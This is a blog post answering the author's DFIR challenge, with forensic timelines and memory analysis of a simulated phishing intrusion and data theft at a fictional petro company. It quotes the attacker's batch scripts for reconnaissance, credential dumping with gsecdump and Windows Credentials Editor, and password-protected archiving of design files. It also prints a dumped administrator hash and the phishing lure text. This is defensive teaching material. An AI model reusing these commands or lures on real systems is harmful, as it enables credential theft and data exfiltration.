Tuesday, December 11, 2012

DFIR Challenge Answers


As promised, here are the answers to my latest dfir challeng.


1. Who delivered the attack?

  • isd@petro-markets.info
    1. 2. Who was the attack delivered too?

    2. amirs@petro-market.org
    3. callb@petro-market.org
    4. wrightd@petro-market.org
      1. 3. What time was the attack delivered?
      2. Mon, 26 Nov 2012 14:00:08 -0600
        1. 4. What time was the attack executed?
        2. ENG-USTXHOU Mon Nov 26 2012 23:01:54
        3. FLD-SARIYADH Tue Nov 27 2012 00:17:58
          1. 5. What is the C2 ip Address?
          2. 58.64.132.141
            1. 6. What is the name of the dropper?
            2. Symantec-1.43-1.exe
              1. 7. What is the name of the backdoor?
              2. 6to4ex.dll
                1. 8. What is the process name the backdoor is running in?
                2. svchost.exe
                  1. 9. What is the process id on all the machines the backdoor is installed on?
                  2. ENG-USTXHOU 1024
                  3. FLD-SARIYADH 1032
                    1. 10. What usernames were used in this attack?
                    2. callb
                    3. amirs
                    4. sysbackup
                      1. 11. What level of access did the attacker have?
                      2. Local system administrator
                        1. 12. How was lateral movement performed?
                        2. Combination of net commands, psexec and .bat scripts
                          1. 13. What .bat scripts were placed on the machines?
                          2. system1.bat
                          3. system2.bat
                          4. syetem3.bat
                          5. system4.bat
                          6. system5.bat
                          7. system6.bat
                            1. 14. What are the contents of each .bat script?

                              1.bat
                              @echo off
                              mkdir c:\windows\webui
                              net share z=c:\windows\webui /GRANT:sysbackup,FULL
                              ipconfig >> c:\windows\webui\system.dll
                              net share >> c:\windows\webui\system.dll
                              net start >> c:\windows\webui\system.dll
                              net view >> c:\windows\webui\system.dll

                              2.bat
                              @echo off
                              c:\windows\webui\gs.exe -a >> c:\windows\webui\svchost.dllst

                              3.bat
                              @echo off
                              dir /S C:\*.dwg > c:\windows\webui\https.dll

                              4.bat
                              @echo off
                              c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll

                              5.bat
                              @echo off
                              copy c:\windows\webui\wc.exe c:\windows\system32
                              at 04:30 wc.exe -e -o h.out

                              6.bat
                              @echo off
                              ipconfig /all >> c:\windows\webui\system.dll
                              net share >> c:\windows\webui\system.dll
                              net start >> c:\windows\webui\system.dll
                              net view >> c:\windows\webui\system.dll
                              15. What other tools were placed on the machines by the attacker?

                            2. gs.exe - gsecdump
                            3. ps.exe - psexec
                            4. ra.exe - rar.exe
                            5. sl.exe - scanline
                            6. wc.exe - Windows Credentials Editor
                              1. 16. What directory was used by the attacker to drop tools?
                              2. c:\windows\webui
                                1. 17. Was the directory newly created or was it there prior to the attack?
                                2. Newly Created
                                  1. 18. What were the names of the exfiltrated files?
                                  2. pump1.dwg - pump100.dwg
                                    1. 19. What did the exfiltrated files contain?
                                    2. Files contained all 0's
                                      1. 20. What time did winrar run?
                                      2. Tue Nov 27 2012 01:11:19
                                        1. 21. What is the md5sum of pump1.dwg?
                                        2. a48266248c04b2ba733238a480690a1c
                                          1. 22. Which machines were compromised and need to be remediated?
                                          2. ENG-USTXHOU-148
                                          3. FLD-SARIYADH-43
                                          4. IIS-SARIYADH-03
                                            1. 23. Which user accounts were compromised and need to be remediated?
                                            2. callb - Used by attacker
                                            3. amirs - Used by attacker
                                            4. sysbackup - Used by attacker
                                            5. saadmin\petro-market.org - Hash seen dumped by gsecdump
                                            6. administrator\current - Hash seen dumped by gsecdump
                                              1. 24. Are there additional machines that need to be analyzed?
                                              2. Yes. The machine of the third phish recipient (wrightd@petro-market.org). That needs to be validated that it has not been comp'd.
                                                1. 25. Describe how each machine was involved in this incident and overall what happened.
                                                2. See writeup
                                                  1. Wednesday, December 5, 2012

                                                    dfir-challenge-IIS-SARIYADH-03

                                                    Timeline


                                                    psexecsvc being created as a result of a remote psexec connection

                                                    Tue Nov 27 2012 00:05:48   181064 macb r/rrwxrwxrwx 0        0        10784-128-3 c:/WINDOWS/PSEXESVC.EXE

                                                    Modified times would indicate the following tools were copied from a different machine


                                                    Tue Nov 27 2012 00:20:33   303104 m... r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
                                                    Tue Nov 27 2012 00:20:40   403968 m... r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe
                                                    Tue Nov 27 2012 00:20:46   208384 m... r/rrwxrwxrwx 0        0        10881-128-3 c:/WINDOWS/webui/wc.exe

                                                    Apparent activity would indicate a logon from sysbackup user


                                                    Tue Nov 27 2012 00:29:06       56 ...b d/drwxrwxrwx 0        0        10008-144-6 c:/Documents and Settings/sysbackup
                                                                                   56 m.c. d/drwxrwxrwx 0        0        3389-144-6 c:/Documents and Settings
                                                                                   56 .a.. d/dr-xr-xr-x 0        0        3390-144-7 c:/Documents and Settings/Default User
                                                                                  360 .a.. d/d--x--x--x 0        0        3411-144-1 c:/Documents and Settings/Default User/Application Data
                                                                                  496 .a.. d/drwxrwxrwx 0        0        3412-144-1 c:/Documents and Settings/Default User/Application Data/Microsoft
                                                                                  152 .a.. d/drwxrwxrwx 0        0        3475-144-1 c:/Documents and Settings/Default User/Cookies
                                                                                   56 .a.. d/d--x--x--x 0        0        3482-144-5 c:/Documents and Settings/Default User/SendTo
                                                                                  256 .a.. d/d-wx-wx-wx 0        0        3483-144-1 c:/Documents and Settings/Default User/Start Menu
                                                                                  696 .a.. d/d-wx-wx-wx 0        0        3486-144-1 c:/Documents and Settings/Default User/Start Menu/Programs
                                                                                  152 .a.. d/d-wx-wx-wx 0        0        3488-144-1 c:/Documents and Settings/Default User/Start Menu/Programs/Startup
                                                                                   56 .a.. d/d--x--x--x 0        0        3490-144-6 c:/Documents and Settings/Default User/Local Settings
                                                                                  256 .a.. d/dr-xr-xr-x 0        0        3492-144-1 c:/Documents and Settings/Default User/Local Settings/Application Data
                                                                                  256 .a.. d/drwxrwxrwx 0        0        3493-144-1 c:/Documents and Settings/Default User/Local Settings/Temporary Internet Files
                                                                                  256 .a.. d/drwxrwxrwx 0        0        3494-144-1 c:/Documents and Settings/Default User/Local Settings/History
                                                                                   56 .a.. d/d-wx-wx-wx 0        0        6182-144-6 c:/Documents and Settings/Default User/Start Menu/Programs/Accessories
                                                    Skipping...

                                                    ipconfig is accessed and would appear to have been executed

                                                    Tue Nov 27 2012 00:44:15    61440 .a.. r/rrwxrwxrwx 0        0        453-128-3 c:/WINDOWS/system32/ipconfig.exe

                                                    system.dll is created

                                                    Tue Nov 27 2012 00:44:16     5711 mac. r/rrwxrwxrwx 0        0        10872-128-3 c:/WINDOWS/webui/system.dll

                                                    net1.exe is accessed indicating the net command was ran

                                                    Tue Nov 27 2012 00:44:16   120320 .a.. r/rrwxrwxrwx 0        0        458-128-3 c:/WINDOWS/system32/net1.exe

                                                    gs.exe is copied to the machine (gsecdump)

                                                    Tue Nov 27 2012 00:53:49   303104 ..cb r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe

                                                    system.dll is created

                                                    Tue Nov 27 2012 00:55:41     1230 ...b r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll

                                                    gs.exe is ran (gsecdump).  It would also appear that svchost.dll is being populated with hashes.


                                                    Tue Nov 27 2012 00:56:43   303104 .a.. r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
                                                                                                    1230 m.c. r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll
                                                                                                 799232 .a.. r/rrwxrwxrwx 0        0        307-128-3 c:/WINDOWS/system32/lsasrv.dll
                                                                                                   34816 .a.. r/rrwxrwxrwx 0        0        308-128-3 c:/WINDOWS/system32/cryptdll.dll
                                                                                                 462848 .a.. r/rrwxrwxrwx 0        0        310-128-3 c:/WINDOWS/system32/samsrv.dll

                                                    svchost.dll is accessed

                                                    Tue Nov 27 2012 00:57:20     1230 .a.. r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll

                                                    https.dll is placed on the machine.  Large amounts of directories begin being accessed as well, like a scan

                                                    Tue Nov 27 2012 01:00:27      5282 ...b r/rrwxrwxrwx 0        0        10875-128-3 c:/WINDOWS/webui/https.dll

                                                    ra.exe gets placed on the system

                                                    Tue Nov 27 2012 01:05:24   403968 ..cb r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe

                                                    WinRAR user profile created for sysbackup user indicating winrar was executed

                                                    Tue Nov 27 2012 01:05:55       48 macb d/drwxrwxrwx 0        0        10877-144-1 c:/Documents and Settings/sysbackup/Application Data/WinRAR

                                                    ra.exe is executed and at the same time .dwg files are accessed as well as netstat.dll and system4.bat are created


                                                    Tue Nov 27 2012 01:11:19   403968 .a.. r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe
                                                                                                2048000 .a.. r/rrwxrwxrwx 0        0        10672-128-3         c:/Engineering/Designs/Pumps/pump1.dwg
                                                                                                2048000 .a.. r/rrwxrwxrwx 0        0        10681-128-3 c:/Engineering/Designs/Pumps/pump10.dwg
                                                                                                       131 .a.b r/rrwxrwxrwx 0        0        10876-128-1 c:/WINDOWS/system32/system4.bat
                                                                                                  109092 ...b r/rrwxrwxrwx 0        0        10878-128-3 c:/WINDOWS/webui/netstat.dll

                                                    Note: pump1.dwg - pump100.dwg are accessed in a 21 second time span

                                                    system5.bat appears to be ran, At job is created to collect hashes

                                                    Tue Nov 27 2012 01:22:08   88 .a.b r/rrwxrwxrwx 0        0        10879-128-1 c:/WINDOWS/system32/system5.bat
                                                                                                 322 ...b r/rrwxrwxrwx 0        0        10880-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                              456 mac. d/drwxrwxrwx 0        0        5639-144-1 c:/WINDOWS/Tasks
                                                                                              24576 .a.. r/rrwxrwxrwx 0        0        652-128-3 c:/WINDOWS/system32/at.exe


                                                    wc.exe is copied and executed


                                                    Tue Nov 27 2012 01:23:36       56 mac. d/drwxrwxrwx 0        0        10871-144-5 c:/WINDOWS/webui
                                                                                                208384 .acb r/rrwxrwxrwx 0        0        10881-128-3 c:/WINDOWS/webui/wc.exe
                                                    Tue Nov 27 2012 01:30:00      322 mac. r/rrwxrwxrwx 0        0        10880-128-1 c:/WINDOWS/Tasks/At1.job

                                                    Response activity detected

                                                    Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        10882-128-3 c:/mdd.exe

                                                    Memory


                                                    PSEXECSVC running out of services.exe



                                                    vol.py pslist -f memdump.bin --profile=Win2003SP0x86
                                                    Volatile Systems Volatility Framework 2.2
                                                    Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit                
                                                    ---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
                                                    0x822b07a8 System                    4      0     60      434 ------      0                                          
                                                    0x82103020 smss.exe                404      4      3       17 ------      0 2012-11-26 22:04:57                      
                                                    0x820ecd88 csrss.exe               452    404     11      388      0      0 2012-11-26 22:04:58                      
                                                    0x82003d88 winlogon.exe            484    404     17      514      0      0 2012-11-26 22:05:00                      
                                                    0x81ff9b08 services.exe            528    484     16      289      0      0 2012-11-26 22:05:01                      
                                                    0x81ff45c8 lsass.exe               540    484     36      487      0      0 2012-11-26 22:05:01                      
                                                    0x81fe9d88 svchost.exe             768    528     10      184      0      0 2012-11-26 22:05:03                      
                                                    0x81fb9cd8 svchost.exe             848    528      8      126      0      0 2012-11-26 22:05:03                      
                                                    0x81fbc020 svchost.exe             868    528      5       78      0      0 2012-11-26 22:05:03                      
                                                    0x81fb3668 svchost.exe             900    528     45      807      0      0 2012-11-26 22:05:03                      
                                                    0x81f9c498 spoolsv.exe            1084    528      8      103      0      0 2012-11-26 22:05:19                      
                                                    0x81f92020 msdtc.exe              1112    528     19      163      0      0 2012-11-26 22:05:19                      
                                                    0x81f84888 svchost.exe            1260    528      2       52      0      0 2012-11-26 22:05:27                      
                                                    0x81f7ac78 inetinfo.exe           1312    528      8      151      0      0 2012-11-26 22:05:27                      
                                                    0x81f82ad8 svchost.exe            1344    528      2       33      0      0 2012-11-26 22:05:27                      
                                                    0x81f77388 wins.exe               1388    528     19      196      0      0 2012-11-26 22:05:27                      
                                                    0x81c94d88 dfssvc.exe             1608    528      9       70      0      0 2012-11-26 22:05:31                      
                                                    0x81f6a9d0 svchost.exe            1656    528     15      138      0      0 2012-11-26 22:05:31                      
                                                    0x81c39608 explorer.exe           1928   1896      9      277      0      0 2012-11-26 22:05:47                      
                                                    0x81c0c200 svchost.exe             256    528     15      120      0      0 2012-11-26 22:06:05                      
                                                    0x81bff828 wuauclt.exe             860    900      5       69      0      0 2012-11-26 22:06:44                      
                                                    0x81bfc268 wmiprvse.exe           1080    768      4      136      0      0 2012-11-26 22:06:44                      
                                                    0x81f7f2b0 PSEXESVC.EXE            268    528      4       85      0      0 2012-11-27 00:05:49                      
                                                    0x81c3f020 cmd.exe                 756   1928      1       22      0      0 2012-11-27 01:50:29                      
                                                    0x81f8d020 mdd.exe                 508    756      1       25      0      0 2012-11-27 01:52:37

                                                    Running the volatility connscan identifies an additional machine that needs to be looked at


                                                    vol.py connscan -f memdump.bin --profile=Win2003SP0x86
                                                    Volatile Systems Volatility Framework 2.2
                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01f19328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x01f52008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x01fbc428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x01febb10 172.16.223.47:1137        172.16.150.10:135         540
                                                    0x01ff8e70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x0200b3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x02010cd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x020129c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x02369ab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x02383008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x02419a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x025dbcd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x02663920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x0d9f2920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x0da0acd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x0da619c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x0daffcd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x0db1fe70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x0db38ab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x0dbe8a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x0dcd2008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x0dd59008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x0dde0328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x0defa3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x0dfa3428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x0e072b10 172.16.223.47:1137        172.16.150.10:135         540
                                                    0x16f7eab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x16ffb920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x17163cd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x17219a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x172f7cd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x17317e70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x174959c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x176ba008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x177db3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x1781c428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x17936328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x179b3008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x17c50b10 172.16.223.47:1137        172.16.150.10:135         540

                                                    This authentication record would appear to tie the ip above (172.16.223.187) to the sysbackup user.  We have also identified an additional hostname FLD-SARIYADH-43

                                                    0000370: fc1c f003 0000 7300 7900 7300 6200 6100  ......s.y.s.b.a.
                                                    0000380: 6300 6b00 7500 7000 0000 4900 4900 5300  c.k.u.p...I.I.S.
                                                    0000390: 2d00 5300 4100 5200 4900 5900 4100 4400  -.S.A.R.I.Y.A.D.
                                                    00003a0: 4800 2d00 3000 3300 0000 2800 3000 7800  H.-.0.3...(.0.x.
                                                    00003b0: 3000 2c00 3000 7800 3500 3700 3200 3500  0.,.0.x.5.7.2.5.
                                                    00003c0: 3700 3300 2900 0000 3300 0000 4e00 7400  7.3.)...3...N.t.
                                                    00003d0: 4c00 6d00 5300 7300 7000 2000 0000 4e00  L.m.S.s.p. ...N.
                                                    00003e0: 5400 4c00 4d00 0000 4600 4c00 4400 2d00  T.L.M...F.L.D.-.
                                                    00003f0: 5300 4100 5200 4900 5900 4100 4400 4800  S.A.R.I.Y.A.D.H.
                                                    0000400: 2d00 3400 3300 0000 2d00 0000 2d00 0000  -.4.3...-...-...
                                                    0000410: 2d00 0000 2d00 0000 2d00 0000 2d00 0000  -...-...-...-...
                                                    0000420: 3100 3700 3200 2e00 3100 3600 2e00 3200  1.7.2...1.6...2.
                                                    0000430: 3200 3300 2e00 3100 3800 3700 0000 3000  2.3...1.8.7...0.


                                                    psexec being ran from FLD-SARIYADH-43


                                                    515426928 psexec-FLD-SARIYADH-43-1600
                                                    516449152 psexec-FLD-SARIYADH-43-664
                                                    516576728 psexec-FLD-SARIYADH-43-420
                                                    523216208 psexec-FLD-SARIYADH-43-1020

                                                    Attacker tool drop directory being shared with full perms for sysbackup user

                                                    482666851 net share z=c:\windows\webui /GRANT:sysbackup,FULL

                                                    Rar command that will archive named netstat.dll with the contents of the Pumps directory excluding all dll's with the password  hclllsddlsdiddklljh

                                                    485343532 c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll



                                                    Using foremost to attempt to recover the rar from memory was partiallty successfull.


                                                    unrar e 00071528.rar 

                                                    UNRAR 4.20 beta 3 freeware      Copyright (c) 1993-2012 Alexander Roshal

                                                    Enter password (will not be echoed) for 00071528.rar: 


                                                    Extracting from 00071528.rar

                                                    Extracting  pump1.dwg                                                 OK 
                                                    Extracting  pump10.dwg                                                OK 
                                                    Extracting  pump100.dwg                                               OK 
                                                    Extracting  pump11.dwg                                                 0%
                                                    CRC failed in the encrypted file Engineering/Designs/Pumps/pump11.dwg. Corrupt file or wrong password.
                                                    CRC failed in the encrypted file 00071528.rar. Corrupt file or wrong password.
                                                    Total errors: 2

                                                    Scheduled task to capture password hashes


                                                    531785668 C:\WINDOWS\Tasks\At1.job
                                                     531785732 wc.exe -e -o h.out
                                                     531785784 At 4:30 AM oPETRO-MARKET

                                                    Scheduled task failed to run


                                                    62817098 "At1.job" (wc.exe) 11/27/2012 4:30:00 AM ** ERROR **
                                                      62817206 Unable to start task.
                                                      62817254 The specific error is:

                                                    Local administrator hash found in memory

                                                    Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::











                                                    dfir-challenge-ENG-USTXHOU-148


                                                    Timeline


                                                    Phish delivered to user.  Taken from memory strings.
                                                    Date: Mon, 26 Nov 2012 14:59:38 -0500

                                                    The creation of the prefetch file indicates the dropper for the backdoor was executed
                                                    Mon Nov 26 2012 23:01:54 22428 macb r/rrwxrwxrwx 0        0        11722-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-3793B625.pf

                                                    At the same time 6to4ex.dll was executed
                                                    100895 .ac. r/rr-xr-xr-x       0         0        8610-128-4 c:/WINDOWS/system32/6to4ex.dll

                                                    Initial beacon identified
                                                    Mon Nov 26 2012 23:01:58

                                                    New directory created to place tools
                                                    Mon Nov 26 2012 23:03:10       56 ...b d/drwxrwxrwx 0     0     7556-144-5 c:/WINDOWS/webui

                                                    ipconfig is ran  
                                                    Mon Nov 26 2012 23:03:21    26602 ...b r/rrwxrwxrwx 0     0     11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
                                                                                                     55808 .a.. r/rrwxrwxrwx 0     0     24145-128-3 c:/WINDOWS/system32/ipconfig.exe

                                                    Obvious tool drop based on exe being created in our newly created directory.
                                                    Mon Nov 26 2012 23:06:34   381816 ...b r/rrwxrwxrwx 0        0        11710-128-3 c:/WINDOWS/ps.exe
                                                    Mon Nov 26 2012 23:06:35   381816 m.c. r/rrwxrwxrwx 0        0        11710-128-3 c:/WINDOWS/ps.exe
                                                    Mon Nov 26 2012 23:06:47   303104 ...b r/rrwxrwxrwx 0        0        11719-128-3 c:/WINDOWS/webui/gs.exe
                                                    Mon Nov 26 2012 23:06:48   303104 mac. r/rrwxrwxrwx 0        0        11719-128-3 c:/WINDOWS/webui/gs.exe
                                                    Mon Nov 26 2012 23:06:52   403968 macb r/rrwxrwxrwx 0        0        11723-128-3 c:/WINDOWS/webui/ra.exe
                                                    Mon Nov 26 2012 23:06:56    20480 macb r/rrwxrwxrwx 0        0        11724-128-3 c:/WINDOWS/webui/sl.exe
                                                    Mon Nov 26 2012 23:06:59   208384 m.cb r/rrwxrwxrwx 0        0        11725-128-3 c:/WINDOWS/webui/wc.exe

                                                    wc.exe is also placed in the c:\windows\system32 directory
                                                    Mon Nov 26 2012 23:06:59   208384 m... r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe

                                                    ipconfig is ran a second time
                                                    Mon Nov 26 2012 23:07:31  26602 mac. r/rrwxrwxrwx 0    0    11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf

                                                    netuse.dll is borne on the filesystem in our tool drop directory the same time ipcconfig is ran
                                                    Mon Nov 26 2012 23:07:31      11844 ...b r/rrwxrwxrwx 0        0        11726-128-3 c:/WINDOWS/webui/netuse.dll

                                                    net.exe is executed
                                                    Mon Nov 26 2012 23:07:53    14394 ...b r/rrwxrwxrwx 0        0        11727-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf

                                                    sl.exe looks like it was executed twice based on the mac times of the prefetch file
                                                    Mon Nov 26 2012 23:10:35     6768 ...b r/rrwxrwxrwx 0        0        11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
                                                    Mon Nov 26 2012 23:11:33     6768 mac. r/rrwxrwxrwx 0        0        11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf

                                                    netuse.dll is accessed and modified as well as gs.exe is executed.  samsrv.dll is also accessed at the same time.  This makes me highly suspicious of hash dumping as samsrv.dll handles local security accounts among other things.  Note: The order that these files are placed does not necessarily reflect the order in which they were executed.
                                                    Mon Nov 26 2012 23:11:58    11844 mac. r/rrwxrwxrwx 0        0        11726-128-3 c:/WINDOWS/webui/netuse.dll
                                                                                                 10002 macb r/rrwxrwxrwx 0        0        11730-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
                                                                                                         415744 .a.. r/rrwxrwxrwx 0        0        23392-128-3 c:/WINDOWS/system32/samsrv.dll

                                                    ping.exe is executed twice
                                                    Mon Nov 26 2012 23:15:44    13296 ...b r/rrwxrwxrwx 0        0        11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
                                                    Mon Nov 26 2012 23:16:14    13296 mac. r/rrwxrwxrwx 0        0        11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf

                                                    wc.exe is executed
                                                    Mon Nov 26 2012 23:58:51    13208 ...b r/rrwxrwxrwx 0        0        11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    ps.exe is executed
                                                    Tue Nov 27 2012 00:00:57    12542 ...b r/rrwxrwxrwx 0        0        11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    wc.exe is executed for a second time
                                                    Tue Nov 27 2012 00:10:44    13208 mac. r/rrwxrwxrwx 0        0        11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    ps.exe is executed for a second time
                                                    Tue Nov 27 2012 00:13:59    12542 mac. r/rrwxrwxrwx 0        0        11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    system.dll is modified
                                                    Tue Nov 27 2012 00:44:16     5711 m... r/rrwxrwxrwx 0        0        11734-128-3 c:/WINDOWS/webui/system.dll

                                                    system.dll is born on the filesystem.  Based on the information above, I would think that system.dll was created on different machine a little less than 4 minutes earlier and copied to this machine.
                                                    Tue Nov 27 2012 00:49:01     5711 .acb r/rrwxrwxrwx 0        0        11734-128-3 c:/WINDOWS/webui/system.dll

                                                    The same would be true for svchost.dll
                                                    Tue Nov 27 2012 00:56:43     1230 m... r/rrwxrwxrwx 0        0        11735-128-3 c:/WINDOWS/webui/svchost.dll
                                                    Tue Nov 27 2012 00:57:20     1230 .acb r/rrwxrwxrwx 0        0        11735-128-3 c:/WINDOWS/webui/svchost.dll

                                                    The same would be true for https.dll
                                                    Tue Nov 27 2012 01:00:34     5282 m... r/rrwxrwxrwx 0        0        11736-128-3 c:/WINDOWS/webui/https.dll
                                                    Tue Nov 27 2012 01:01:39     5282 .acb r/rrwxrwxrwx 0        0        11736-128-3 c:/WINDOWS/webui/https.dll

                                                    The same would be true for netstat.dll
                                                    Tue Nov 27 2012 01:11:40   109092 m... r/rrwxrwxrwx 0        0        11737-128-3 c:/WINDOWS/webui/netstat.dll
                                                    Tue Nov 27 2012 01:14:48   109092 .acb r/rrwxrwxrwx 0        0        11737-128-3 c:/WINDOWS/webui/netstat.dll

                                                    system5.bat is created
                                                    Tue Nov 27 2012 01:26:47       88 macb r/rrwxrwxrwx 0        0        11738-128-1 c:/WINDOWS/webui/system5.bat

                                                    wc.exe is accessed and would appear to be copied to the system32 directory
                                                    Tue Nov 27 2012 01:27:03   208384 .a.. r/rrwxrwxrwx 0        0        11725-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                       208384 ...b r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe

                                                    At the same time an at.exe was executed and a scheduled task borne
                                                    Tue Nov 27 2012 01:27:03      322 ...b r/rrwxrwxrwx 0        0        11740-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                      12948 ...b r/rrwxrwxrwx 0        0        11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf

                                                    It would appear that scheduled task was set to execute at 01:30:00.  wc.exe was executed via the scheduled task and h.out was created as a result.
                                                    Tue Nov 27 2012 01:30:00   208384 .ac. r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                             322 mac. r/rrwxrwxrwx 0        0        11740-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                             268 macb r/rrwxrwxrwx 0        0        11742-128-1 c:/WINDOWS/system32/h.out

                                                    Additional prefetch file created for wc.exe
                                                    Tue Nov 27 2012 01:30:10    10720 macb r/rrwxrwxrwx 0        0        11743-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf

                                                    Additional prefetch entry created for at.exe
                                                    Tue Nov 27 2012 01:32:36    12948 mac. r/rrwxrwxrwx 0        0        11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf

                                                    Responder activity identified
                                                    Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        11744-128-3 c:/mdd.exe

                                                    Memory analysis


                                                    Original phish.  Notice the link pointing the user to http://58.64.132.8/download/Symantec-1.43-1.exe

                                                      34435092 ceived: from ubuntu-router ([172.16.150.8]) by dc-ustxhou.petro-market.org with Microsoft SMTPSVC(6.0.3790.0);
                                                      34435204       Mon, 26 Nov 2012 14:00:08 -0600
                                                      34435239 Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
                                                      34435306      by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
                                                      34435388      Mon, 26 Nov 2012 15:00:07 -0500
                                                      34435422 Message-ID: <FCE1C36C7BBC46AFB7C2A251EA868B8B@d0793h>
                                                      34435477 From: "Security Department" <isd@petro-markets.info>
                                                      34435531 To: <amirs@petro-market.org>, <callb@petro-market.org>,
                                                      34435588         <wrightd@petro-market.org>
                                                      34435624 Subject: Immediate Action
                                                      34435651 Date: Mon, 26 Nov 2012 14:59:38 -0500
                                                      34435690 MIME-Version: 1.0
                                                      34435709 Content-Type: multipart/alternative;
                                                      34435747      boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
                                                      34435802 X-Priority: 3
                                                      34435817 X-MSMail-Priority: Normal
                                                      34435844 X-Mailer: Microsoft Outlook Express 6.00.2900.5512
                                                      34435896 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
                                                      34435954 Return-Path: isd@petro-markets.info
                                                      34435991 X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
                                                      34436078 This is a multi-part message in MIME format.
                                                      34436126 ------=_NextPart_000_0015_01CDCBE6.A7B92DE0
                                                      34436171 Content-Type: text/plain;
                                                      34436198      charset="iso-8859-1"
                                                      34436221 Content-Transfer-Encoding: quoted-printable
                                                      34436268 Attn: Immediate Action is Required!!
                                                      34436308 The IS department is requiring that all associates update to the new =
                                                      34436380 version of anti-virus.  This is critical and must be done ASAP!  Failure =
                                                      34436456 to update anti-virus may result in negative actions.
                                                      34436512 Please download the new anti-virus and follow the instructions.  Failure =
                                                      34436588 to install this anti-virus may result in loosing your job!
